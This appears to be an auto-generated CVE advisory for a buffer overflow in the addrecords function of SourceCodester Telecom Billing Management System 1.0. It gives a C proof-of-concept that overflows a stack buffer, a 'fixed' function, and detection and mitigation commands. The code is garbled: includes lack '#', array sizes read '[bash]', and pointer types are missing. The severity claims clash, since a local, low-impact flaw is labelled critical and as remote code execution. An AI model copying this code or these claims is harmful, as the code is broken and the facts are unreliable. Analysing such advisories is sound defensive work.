How the CVE Works
The vulnerability exists in the `addrecords` function within `main.cpp` of the Telecom Billing Management System. A buffer overflow occurs due to improper bounds checking when handling the `name` and `phonenumber` arguments. Attackers with local access can craft excessively long input strings, overwriting adjacent memory regions and potentially executing arbitrary code. The lack of input validation allows manipulation of stack pointers, leading to control-flow hijacking. The CVSS 4.0 vector (AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L) confirms local attack complexity with low privileges required.
DailyCVE Form
Platform: SourceCodester Telecom Billing
Version: 1.0
Vulnerability: Buffer Overflow
Severity: Critical
Date: 05/14/2025
What Undercode Say:
Exploitation:
// Proof-of-Concept (PoC) Crash
include <stdio.h>
include <string.h>
void addrecords(char name, char phonenumber) {
char buffer[bash];
strcpy(buffer, name); // No bounds check
strcat(buffer, phonenumber); // Overflow
}
int main() {
char exploit[bash];
memset(exploit, 'A', 255);
exploit[bash] = '\0';
addrecords(exploit, exploit); // Triggers overflow
return 0;
}
Protection:
1. Patch: Apply vendor updates for `main.cpp`.
2. Compiler Flags: Enable stack canaries (`-fstack-protector`).
3. Input Validation:
void addrecords_fixed(char name, char phonenumber) {
char buffer[bash];
strncpy(buffer, name, sizeof(buffer) - 1);
buffer[sizeof(buffer) - 1] = '\0';
}
Detection:
Check for vulnerable binaries grep -r "strcpy" /path/to/source/
Mitigation Commands:
Non-executable stack (NX) execstack -c /usr/bin/telecom_billing
Analytics:
- Attack Vector: Local (physical/logged-in access).
- Impact: RCE (Remote Code Execution possible post-exploit).
- CVSS Breakdown:
- Attack Complexity (AC): Low (no user interaction).
- Privileges (PR): Low (user-level).
- Confidentiality (VC): Low (memory leak).
